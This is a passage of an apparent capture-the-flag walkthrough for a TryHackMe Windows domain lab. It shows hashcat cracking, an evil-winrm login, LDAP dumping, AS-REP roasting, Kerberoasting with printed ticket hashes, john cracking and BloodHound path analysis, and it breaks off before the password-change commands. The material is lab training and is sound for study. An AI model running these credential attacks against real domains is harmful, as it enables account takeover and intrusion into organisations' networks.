\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>hashcat<\/span> <\/span>hash<\/span> <\/span>\/usr\/share\/wordlists\/rockyou.txt<\/span> <\/span><\/span>\nhashcat<\/span> (v6.2.6) starting <\/span>in<\/span> autodetect mode<\/span><\/span>\n<\/span>\n..<\/span><SNIPPED><\/span>..<\/span><\/span>\n<\/span>\nDictionary<\/span> <\/span>cache<\/span> <\/span>hit:<\/span><\/span>\n*<\/span> Filename..: \/usr\/share\/wordlists\/rockyou.txt<\/span><\/span>\n*<\/span> Passwords.: 14344385<\/span><\/span>\n*<\/span> Bytes.....: 139921507<\/span><\/span>\n*<\/span> Keyspace..: 14344385<\/span><\/span>\n<\/span>\nAUTOMATE::THM:3ff742788e50ecf9:351623092413a92a3b1c585323e9af40:01010000000000008086039e0b52da01b200879a6cda0dcd0000000002000800310057003700330001001e00570049004e002d0046004b004d005600500047004300450031004e00460004003400570049004e002d0046004b004d005600500047004300450031004e0046002e0031005700370033002e004c004f00430041004c000300140031005700370033002e004c004f00430041004c000500140031005700370033002e004c004f00430041004c00070008008086039e0b52da0106000400020000000800300030000000000000000100000000200000371a1642f741a2f7aebaf60815161aa471f2a2f89f4a59df8917c4e7a7f95bcf0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310033002e0031002e003100310032000000000000000000:PassXXXXXXX<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
After getting the password, we can log in to the machine using evil-winrm<\/mark><\/em><\/strong> and get the user flag.<\/p>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>evil-winrm<\/span> <\/span>-i<\/span> <\/span>10.10<\/span>.52.38<\/span> <\/span>-u<\/span> <\/span>AUTOMATE<\/span><\/span>\nEnter<\/span> <\/span>Password:<\/span> <\/span><\/span>\n                                        <\/span><\/span>\nEvil-WinRM<\/span> <\/span>shell<\/span> <\/span>v3.5<\/span><\/span>\n                                        <\/span><\/span>\nWarning:<\/span> <\/span>Remote<\/span> <\/span>path<\/span> <\/span>completions<\/span> <\/span>is<\/span> <\/span>disabled<\/span> <\/span>due<\/span> <\/span>to<\/span> <\/span>ruby<\/span> <\/span>limitation:<\/span> <\/span>quoting_detection_proc<\/span>()<\/span> <\/span>function<\/span> <\/span>is<\/span> <\/span>unimplemented<\/span> <\/span>on<\/span> <\/span>this<\/span> <\/span>machine<\/span><\/span>\n                                        <\/span><\/span>\nData:<\/span> <\/span>For<\/span> <\/span>more<\/span> <\/span>information,<\/span> <\/span>check<\/span> <\/span>Evil-WinRM<\/span> <\/span>GitHub:<\/span> <\/span>https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion<\/span><\/span>\n                                        <\/span><\/span>\nInfo:<\/span> <\/span>Establishing<\/span> <\/span>connection<\/span> <\/span>to<\/span> <\/span>remote<\/span> <\/span>endpoint<\/span><\/span>\n*<\/span>Evil-WinRM<\/span>*<\/span> PS C:\\Users\\automate\\Documents<\/span>><\/span> <\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
*<\/span>Evil<\/span>-<\/span>WinRM<\/span>*<\/span> PS C:\\Users\\automate\\Desktop<\/span>><\/span> dir<\/span><\/span>\n<\/span>\n<\/span>\n    Directory: C:\\Users\\automate\\Desktop<\/span><\/span>\n<\/span>\n<\/span>\nMode                LastWriteTime         Length Name<\/span><\/span>\n----<\/span>                <\/span>-------------<\/span>         <\/span>------<\/span> <\/span>----<\/span><\/span>\n-<\/span>a<\/span>----<\/span>        <\/span>6<\/span>\/<\/span>21<\/span>\/<\/span>2016<\/span>   <\/span>3<\/span>:<\/span>36<\/span> PM            <\/span>527<\/span> EC2 Feedback.website<\/span><\/span>\n-<\/span>a<\/span>----<\/span>        <\/span>6<\/span>\/<\/span>21<\/span>\/<\/span>2016<\/span>   <\/span>3<\/span>:<\/span>36<\/span> PM            <\/span>554<\/span> EC2 Microsoft Windows Guide.website<\/span><\/span>\n-<\/span>a<\/span>----<\/span>        <\/span>6<\/span>\/<\/span>16<\/span>\/<\/span>2023<\/span>   <\/span>4<\/span>:<\/span>35<\/span> PM             <\/span>31<\/span> user.txt<\/span><\/span>\n<\/span>\n<\/span>\n*<\/span>Evil<\/span>-<\/span>WinRM<\/span>*<\/span> PS C:\\Users\\automate\\Desktop<\/span>><\/span> type user.txt<\/span><\/span>\nTHM<\/span>{<\/span>AUTOMATION_XXX_XXX_XXX<\/span>}<\/span><\/span>\n*<\/span>Evil<\/span>-<\/span>WinRM<\/span>*<\/span> PS C:\\Users\\automate\\Desktop<\/span>><\/span> <\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Enumerating Domain<\/mark><\/h3>\n\n\n\n
Since we have a set of credentials for a domain user, we can use them to enumerate the domain using LDAP tools. We can use ldapdomaindump <\/mark><\/em><\/strong>to dump the below information from the domain which includes, domain users, groups, computers, etc.,<\/p>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/LDAP<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>ldapdomaindump<\/span> <\/span>10.10<\/span>.52.38<\/span> <\/span>-u<\/span> <\/span>'<\/span>thm.corp\\AUTOMATE<\/span>'<\/span> <\/span>-p<\/span> <\/span>'<\/span>Passw0rd1<\/span>'<\/span>                                      <\/span><\/span>\n[*]<\/span> Connecting to host...<\/span><\/span>\n[*]<\/span> Binding to host<\/span><\/span>\n[<\/span>+<\/span>]<\/span> Bind OK<\/span><\/span>\n[*]<\/span> Starting domain dump<\/span><\/span>\n[<\/span>+<\/span>]<\/span> Domain dump finished<\/span><\/span>\n                                                                                                             <\/span><\/span>\n\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/LDAP<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>ls<\/span>                                                              <\/span><\/span>\ndomain_computers.grep<\/span>        <\/span>domain_groups.html<\/span>  <\/span>domain_trusts.grep<\/span>  <\/span>domain_users.json<\/span><\/span>\ndomain_computers.html<\/span>        <\/span>domain_groups.json<\/span>  <\/span>domain_trusts.html<\/span>  <\/span>domain_users_by_group.html<\/span><\/span>\ndomain_computers.json<\/span>        <\/span>domain_policy.grep<\/span>  <\/span>domain_trusts.json<\/span>  <\/span><\/span>\ndomain_computers_by_os.html<\/span>  <\/span>domain_policy.html<\/span>  <\/span>domain_users.grep<\/span><\/span>\ndomain_groups.grep<\/span>           <\/span>domain_policy.json<\/span>  <\/span>domain_users.html<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/LDAP<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>jq<\/span> <\/span>-r<\/span> <\/span>'<\/span>.[].attributes.sAMAccountName[0]<\/span>'<\/span> <\/span>domain_users.json<\/span><\/span>\nAUTOMATE<\/span><\/span>\nRAQUEL_BENSON<\/span><\/span>\nLEANN_LONG<\/span><\/span>\nTREVOR_MELTON<\/span><\/span>\nAUGUSTA_HAMILTON<\/span><\/span>\nTED_JACOBSON<\/span><\/span>\n3966486072SA<\/span><\/span>\nMARION_CLAY<\/span><\/span>\nMORGAN_SELLERS<\/span><\/span>\n3811465497SA<\/span><\/span>\nCHRISTINA_MCCORMICK<\/span><\/span>\n<\/span>\n..<\/span><SNIPPED><\/span>..<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
ASREProast<\/mark><\/h4>\n\n\n\n
GetNPUsers.py<\/a> can be used to retrieve domain users who do not have a “Do not require Kerberos preauthentication” set and ask for their TGTs without knowing their passwords. It is then possible to attempt to crack the session key sent along with the ticket to retrieve the user password. This attack is known as ASREProast<\/a>.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/LDAP<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>impacket-GetNPUsers<\/span> <\/span>thm.corp\/AUTOMATE<\/span>  <\/span><\/span>\nImpacket<\/span> <\/span>v0.11.0<\/span> <\/span>-<\/span> <\/span>Copyright<\/span> <\/span>2023<\/span> <\/span>Fortra<\/span><\/span>\n<\/span>\nPassword:<\/span><\/span>\nName<\/span>           <\/span>MemberOf<\/span>                                                      <\/span>PasswordLastSet<\/span>             <\/span>LastLogon<\/span>                   <\/span>UAC<\/span>      <\/span><\/span>\n-------------<\/span>  <\/span>------------------------------------------------------------<\/span>  <\/span>--------------------------<\/span>  <\/span>--------------------------<\/span>  <\/span>--------<\/span><\/span>\nERNESTO_SILVA<\/span>  <\/span>CN=Gu-gerardway-distlist1,OU=AWS,OU=Stage,DC=thm,DC=corp<\/span>      <\/span>2023<\/span>-07-18<\/span> <\/span>11<\/span>:21:44.224354<\/span>  <\/span><<\/span>neve<\/span>r<\/span>><\/span>                     <\/span>0x410200<\/span> <\/span><\/span>\nTABATHA_BRITT<\/span>  <\/span>CN=Gu-gerardway-distlist1,OU=AWS,OU=Stage,DC=thm,DC=corp<\/span>      <\/span>2023<\/span>-08-21<\/span> <\/span>15<\/span>:32:59.571306<\/span>  <\/span>2023<\/span>-08-21<\/span> <\/span>15<\/span>:32:05.792734<\/span>  <\/span>0x410200<\/span> <\/span><\/span>\nLEANN_LONG<\/span>     <\/span>CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span>  <\/span>2023<\/span>-07-18<\/span> <\/span>11<\/span>:21:44.161807<\/span>  <\/span>2023<\/span>-06-16<\/span> <\/span>07<\/span>:16:11.147334<\/span>  <\/span>0x410200<\/span> <\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Since these three users are in the same group, we can grab their TGT hashes by simply running the following command.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>impacket-GetNPUsers<\/span> <\/span>thm.corp\/ERNESTO_SILVA<\/span><\/span>\nImpacket<\/span> <\/span>v0.11.0<\/span> <\/span>-<\/span> <\/span>Copyright<\/span> <\/span>2023<\/span> <\/span>Fortra<\/span><\/span>\n<\/span>\nPassword:<\/span><\/span>\n[*]<\/span> Cannot authenticate ERNESTO_SILVA, getting its TGT<\/span><\/span>\n$krb5asrep$23$ERNESTO_SILVA@THM.CORP:d300ae23d022f70e1d45a886be57cac2$1c39ef5e656e37d8ef496e291789abf2977b7223f6d2a6a419afbc5486ff4e8f18935408e185603dcbe91506854a55e43300e03188c8e981341ff8aaf1cbac028ad1eec41be42cf4f9164019f65b983d3f1a71bcae122ec9fef93920f7010e476fdf5321c8dfa2112288dc4138573fcc81185c364b3cd8ef2b735c14846bf0eeb65dc42e3e39312d78c12cf8af8177e44673a8a7d84e8fdd6bd2847e3509b87245acd85aa14811b28654942c9a947b51d9aaf2cef20e4c38ba18856dc12e843046458afea9615c255c194fb69a72a34095b5cd15d39ed856ffb456a758020ee101f850<\/span><\/span>\n<\/span>\n<\/span>\n\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>impacket-GetNPUsers<\/span> <\/span>thm.corp\/TABATHA_BRITT<\/span><\/span>\nImpacket<\/span> <\/span>v0.11.0<\/span> <\/span>-<\/span> <\/span>Copyright<\/span> <\/span>2023<\/span> <\/span>Fortra<\/span><\/span>\n<\/span>\nPassword:<\/span><\/span>\n[*]<\/span> Cannot authenticate TABATHA_BRITT, getting its TGT<\/span><\/span>\n$krb5asrep$23$TABATHA_BRITT@THM.CORP:d6e6f0bd263464212f9b562917ae7b06$f1a0ee5c074f9f5780524e6670bf8b44ea6000e58df5c558c7daa071233919adc2143a0bb8fe2401ea6c091ec0c692920584a0c8f8c7fbf6038124946087fa46366202d66855183e802198f2b7061fa012d5a2905c25b113f90a089253e386c41be6e668367ca692c4ec08c1fd1467879b863660732c8e38a156687da1d7c0d2fc6315d4c29772c987f7bfab390b090e1393a65c0101c4c0655ba7c57ed4bf6b2010992000ca07dc45c5e9963dc7bef00fb0131cf4d9b734ebea0ee4ee4dec2d4c7310c8d46273b9ae0aba4cc15895cedd90594f3e61bf3e56d3cdb1f937187264c0a740<\/span><\/span>\n<\/span>\n<\/span>\n\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>impacket-GetNPUsers<\/span> <\/span>thm.corp\/LEANN_LONG<\/span>   <\/span><\/span>\nImpacket<\/span> <\/span>v0.11.0<\/span> <\/span>-<\/span> <\/span>Copyright<\/span> <\/span>2023<\/span> <\/span>Fortra<\/span><\/span>\n<\/span>\nPassword:<\/span><\/span>\n[*]<\/span> Cannot authenticate LEANN_LONG, getting its TGT<\/span><\/span>\n$krb5asrep$23$LEANN_LONG@THM.CORP:b3be523ae5e4f0fd2b9c151d4b797218$dedd3581eb9545f7f1fa74d6cfa85abd9a93c13632b479ce1313feb1fefc3bed18857777c6259ec1eeaff87fb42d3fb02f468cd0b5c7ca8423a0013ce8f7115d949780af58317e4dd80d143ac59ef224e592f9343d9aab82d0153cc1d2fcb560444703d99e2d20ec6b937fce756086f9613c7c4109218d4e036e757fc496f9611ae12c892c44effde6fd52ee3e9c2b15646571273017f11819a827e68d7b714872b519eb2940ee5c0378bcf2c960d5ac270cd6e35452b221ecc176763ed5e0e36880aefcc84e67f97eaa2fdde60a1bbf2a06aed695943ba46d8ed0c9de176d6f415af294<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Out of the three user hashes we obtained, we can crack one for the user TABATHA_BRITT<\/mark><\/strong>.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>john<\/span> <\/span>tabatha.hash<\/span> <\/span>--wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/span> <\/span><\/span>\nUsing<\/span> <\/span>default<\/span> <\/span>input<\/span> <\/span>encoding:<\/span> <\/span>UTF-8<\/span><\/span>\nLoaded<\/span> <\/span>1<\/span> <\/span>password<\/span> <\/span>hash<\/span> (krb5asrep, <\/span>Kerberos<\/span> <\/span>5<\/span> <\/span>AS-REP<\/span> <\/span>etype<\/span> <\/span>17<\/span>\/18\/23<\/span> [MD4 <\/span>HMAC-MD5<\/span> <\/span>RC4<\/span> <\/span>\/<\/span> <\/span>PBKDF2<\/span> <\/span>HMAC-SHA1<\/span> <\/span>AES<\/span> <\/span>128<\/span>\/128<\/span> <\/span>SSE2<\/span> <\/span>4<\/span>x]<\/span>)<\/span><\/span>\nWill<\/span> <\/span>run<\/span> <\/span>4<\/span> <\/span>OpenMP<\/span> <\/span>threads<\/span><\/span>\nPress<\/span> <\/span>'<\/span>q<\/span>'<\/span> <\/span>or<\/span> <\/span>Ctrl-C<\/span> <\/span>to<\/span> <\/span>abort,<\/span> <\/span>almost<\/span> <\/span>any<\/span> <\/span>other<\/span> <\/span>key<\/span> <\/span>for<\/span> <\/span>status<\/span><\/span>\nmarlxxxxxx<\/span>)   <\/span>(<\/span>$krb5asrep$23$TABATHA_BRITT@THM.CORP<\/span>)<\/span>     <\/span><\/span>\n1g<\/span> <\/span>0<\/span>:00:00:04<\/span> <\/span>DONE<\/span> (2024-01-28 <\/span>18<\/span>:48<\/span>) 0.2008g\/s 1157Kp\/s 1157Kc\/s 1157KC\/s marlee109..markyza3<\/span><\/span>\nUse<\/span> <\/span>the<\/span> <\/span>"<\/span>--show<\/span>"<\/span> <\/span>option<\/span> <\/span>to<\/span> <\/span>display<\/span> <\/span>all<\/span> <\/span>of<\/span> <\/span>the<\/span> <\/span>cracked<\/span> <\/span>passwords<\/span> <\/span>reliably<\/span><\/span>\nSession<\/span> <\/span>completed.<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
GetUserSPNs<\/mark><\/h4>\n\n\n\n
GetUserSPNs.py<\/a> can be used to obtain a password hash for user accounts that have an SPN (service principal name). If an SPN is set on a user account it is possible to request a Service Ticket for this account and attempt to crack it in order to retrieve the user password. This attack is named Kerberoast<\/a>. This script can also be used for Kerberoast without preauthentication<\/a>.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/LDAP<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>impacket-GetUserSPNs<\/span> <\/span>thm.corp\/AUTOMATE:Passw0rd1<\/span> <\/span>-dc-ip<\/span> <\/span>10.10<\/span>.52.38<\/span> <\/span>-request<\/span><\/span>\nImpacket<\/span> <\/span>v0.11.0<\/span> <\/span>-<\/span> <\/span>Copyright<\/span> <\/span>2023<\/span> <\/span>Fortra<\/span><\/span>\n<\/span>\nServicePrincipalName<\/span>  <\/span>Name<\/span>               <\/span>MemberOf<\/span>                                                      <\/span>PasswordLastSet<\/span>             <\/span>LastLogon<\/span>                   <\/span>Delegation<\/span>  <\/span><\/span>\n--------------------<\/span>  <\/span>-----------------<\/span>  <\/span>------------------------------------------------------------<\/span>  <\/span>--------------------------<\/span>  <\/span>--------------------------<\/span>  <\/span>-----------<\/span><\/span>\nCIFS\/BDEWVIR1000000<\/span>   <\/span>MARCELINO_BALLARD<\/span>  <\/span>CN=AN-173-distlist1,OU=GOO,OU=People,DC=thm,DC=corp<\/span>           <\/span>2023<\/span>-06-12<\/span> <\/span>11<\/span>:05:55.645235<\/span>  <\/span><<\/span>neve<\/span>r<\/span>><\/span>                                 <\/span><\/span>\nCIFS\/HAYSTACK<\/span>         <\/span>3811465497<\/span>SA<\/span>       <\/span>CN=Remote<\/span> <\/span>Management<\/span> <\/span>Users,CN=Builtin,DC=thm,DC=corp<\/span>          <\/span>2023<\/span>-06-12<\/span> <\/span>11<\/span>:05:58.082696<\/span>  <\/span><<\/span>neve<\/span>r<\/span>><\/span>                                 <\/span><\/span>\nMSSQL\/BDEWVIR1000000<\/span>  <\/span>MARION_CLAY<\/span>        <\/span>CN=Protected<\/span> <\/span>Users,CN=Users,DC=thm,DC=corp<\/span>                    <\/span>2023<\/span>-06-12<\/span> <\/span>11<\/span>:05:58.379575<\/span>  <\/span><<\/span>neve<\/span>r<\/span>><\/span>                                 <\/span><\/span>\nftp\/HAYSTACK<\/span>          <\/span>MARION_CLAY<\/span>        <\/span>CN=Protected<\/span> <\/span>Users,CN=Users,DC=thm,DC=corp<\/span>                    <\/span>2023<\/span>-06-12<\/span> <\/span>11<\/span>:05:58.379575<\/span>  <\/span><<\/span>neve<\/span>r<\/span>><\/span>                                 <\/span><\/span>\nhttps\/HAYSTACK<\/span>        <\/span>FANNY_ALLISON<\/span>      <\/span>CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span>  <\/span>2023<\/span>-06-12<\/span> <\/span>11<\/span>:05:55.067142<\/span>  <\/span><<\/span>neve<\/span>r<\/span>><\/span>                                 <\/span><\/span>\nkafka\/HAYSTACK<\/span>        <\/span>FANNY_ALLISON<\/span>      <\/span>CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span>  <\/span>2023<\/span>-06-12<\/span> <\/span>11<\/span>:05:55.067142<\/span>  <\/span><<\/span>neve<\/span>r<\/span>><\/span>                                 <\/span><\/span>\nkafka\/BDEWVIR1000000<\/span>  <\/span>CYRUS_WHITEHEAD<\/span>    <\/span>CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span>  <\/span>2023<\/span>-06-12<\/span> <\/span>11<\/span>:05:54.332753<\/span>  <\/span><<\/span>neve<\/span>r<\/span>><\/span>                                 <\/span><\/span>\nMSSQL\/HAYSTACK<\/span>        <\/span>TRACY_CARVER<\/span>       <\/span>CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span>  <\/span>2023<\/span>-06-12<\/span> <\/span>11<\/span>:05:53.879633<\/span>  <\/span><<\/span>neve<\/span>r<\/span>><\/span>                                 <\/span><\/span>\nPOP3\/BDEWVIR1000000<\/span>   <\/span>DEANNE_WASHINGTON<\/span>  <\/span>CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span>  <\/span>2023<\/span>-06-12<\/span> <\/span>11<\/span>:05:54.488998<\/span>  <\/span><<\/span>neve<\/span>r<\/span>><\/span>                                 <\/span><\/span>\nPOP3\/HAYSTACK<\/span>         <\/span>DARLA_WINTERS<\/span>      <\/span>CN=Domain<\/span> <\/span>Computers,CN=Users,DC=thm,DC=corp<\/span>                   <\/span>2023<\/span>-07-18<\/span> <\/span>11<\/span>:21:44.443061<\/span>  <\/span>2023<\/span>-07-18<\/span> <\/span>11<\/span>:28:56.952295<\/span>  <\/span>constrained<\/span> <\/span><\/span>\n<\/span>\n..<\/span><SNIPPED><\/span>..<\/span><\/span>\n<\/span>\n$krb5tgs$23$<\/span>*<\/span>DARLA_WINTERS$THM.CORP$thm.corp\/DARLA_WINTERS<\/span>*<\/span>$07e8a7acc86e305030c0481913777d9d$25ecd65754d601ed4274a4d38724dc515293936a2cc47f73ba95af1615815e03e0d9bddcba10447528f5cfaaa2d8cca693a052911fae08b65a51064a4329d564967d7adbb5671ad56add7ee4391c34bf38d1c71bbab1937594b8082fdf153b00a188a488d8963d6272635938dd32644721b4873b59ecce1f16c69ffd78c7d08195109b0965055bd8125e6d2ee5abd0d9ebcc0cad64ce95b88d2e5e5219ac0891c27c5d82fa72920f1cc9ad0d1ed9e53a1d6054216339d9fe09f15ae7d0f67c22fd050e727f49bb747d46e131636dd5602928cd8fe2c01baa81286bfee80f7bcb522efd417b3a3ac06a7714fc24ff87a6ab4b34daa6d7cce6f72f212cba3bc02214b8cee12e656c40b5b68a11699ecb65b3e6541497549fea71a3cb622d6274207bcf7da97f91a6640f5fddea7229287a4578453c61d16fcbd42e57897a7c1c2a5ada51be65d13ba876eb836117c8453baac83f3a07d282d0f566e8503d42649078f8da8decbf69e8dceec565a8a5769a2b4f18bbd1fcf5646f54b40936a2979ad614278ce68f2d867ec4ae60fe7122e1188926da9214d60f4f428be3a9a6b992ed87e29551df8bb2a1504438e1cba80cc3fd092967f3333e72356aceae5d4ba15423c51b0a25c98acc093c1ebb112d39515f119e25b7d981e2f93cadb71c40529f5baddf3d3fffc0cb116a175358dc10d9250bec5778c127b1d39f81e8e6401d9e68a8f259240e3fa82fc6e68f1deb8f0a75767282c1e2d5605e3542be1f6173cead327a513d3ca1a593cd3e8eb013d7150bbfe1a5a719e33eb0c6f8eaa118fb74a9e42e3c26818ec6c32c0efb465725fa2df921b6ac898ebf25c61245f4756efa38faee05159cd71f4578207404d8351d8b702b7c992e7011cf9e58319513da489fa2f7f74b5624cf3ec18b0723928a412f06c29d9cbf9489af5bf965978f2bc7b76c498f00f385b4af7862015a7a2f0808c4b42bb495a971f80c9efbdf42286d4c3492914c644c3a59ee679de3ba8d2e1f538e220f9ed22ec1c470ff12abe7d9869c3823eefefbc785f1bca39e325f534fe91c8df9f6c53b91598ef7a2e83536968326cbb65311e349678212ec4c327ae86cce6f481399d23e8d169d03f494b8197a3a5d2a5b71bc69146ccc2d183fa00e7b73e84f28a9e98a31a689598fc080165794cfa683ea3efd2cdb2859178a24e14d589456beae2826b722fc6758d62e0d8dd0167e0973c0ed33d32d277e468db4920d0ebb0e82d1e31639322f8317512713fea56de6e1aa3ad91ddd65dd6c12d36debac9fa3bfb9047ba03408cb4c86947e0b34a1f9ea964048db17db38a5dad79a8bad319a8a87f2149a65c4c9298e1b164ed6142986ba49e4e0b892595192561b410c0bccac2163a4c45704adcf8a14dae69a15fb0172c9a935c404622f180bca50c21dcb471c3a9c030e28b2a877<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
\n
We found more hashes for users but we will keep this aside for now. I tried cracking a couple of hashes but was unsuccessful.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n
<\/div>\n\n\n\n
Enumerating Domain with BloodHound<\/mark><\/h3>\n\n\n\n
We can use TABITHA_BRITT’s credentials to run BloodHound. Once we gather all the files, we will upload it to the BloodHound tool and start analyzing them.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/BloodHound<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>bloodhound-python<\/span> <\/span>-d<\/span> <\/span>thm.corp<\/span> <\/span>-u<\/span> <\/span>TABATHA_BRITT<\/span> <\/span>-p<\/span> <\/span>marxxxxxxxxx<\/span>)<\/span>'<\/span> -ns 10.10.52.38 -c all<\/span><\/span>\nINFO: Found AD domain: thm.corp<\/span><\/span>\nINFO: Getting TGT for user<\/span><\/span>\nINFO: Connecting to LDAP server: haystack.thm.corp<\/span><\/span>\nINFO: Found 1 domains<\/span><\/span>\nINFO: Found 1 domains in the forest<\/span><\/span>\nINFO: Found 1 computers<\/span><\/span>\nINFO: Connecting to LDAP server: haystack.thm.corp<\/span><\/span>\nINFO: Found 42 users<\/span><\/span>\nINFO: Found 55 groups<\/span><\/span>\nINFO: Found 3 gpos<\/span><\/span>\nINFO: Found 222 ous<\/span><\/span>\nINFO: Found 19 containers<\/span><\/span>\nINFO: Found 0 trusts<\/span><\/span>\nINFO: Starting computer enumeration with 10 workers<\/span><\/span>\nINFO: Querying computer: HayStack.thm.corp<\/span><\/span>\nINFO: Done in 01M 44S<\/span><\/span>\n                                                                                                             <\/span><\/span>\n\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/BloodHound]<\/span><\/span>\n\u2514\u2500$ ls<\/span><\/span>\n20240128185605_computers.json   20240128185605_gpos.json    20240128185605_users.json<\/span><\/span>\n20240128185605_containers.json  20240128185605_groups.json<\/span><\/span>\n20240128185605_domains.json     20240128185605_ous.json<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
We can search for our user and mark as owned. Then go to OUTBOUND OBJECT CONTROL under the Node Analysis tab and click on Transitive Object Control<\/mark><\/em><\/strong>. Here you will see how we can move laterally from one user to another and shorten our path to the Administrator.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
By right-clicking on the link between two users and then clicking on the Help option, BloodHound will show you how to abuse the rights to have been assigned and change their RPC passwords.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
By running the following commands, we can change passwords for the users along the path.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
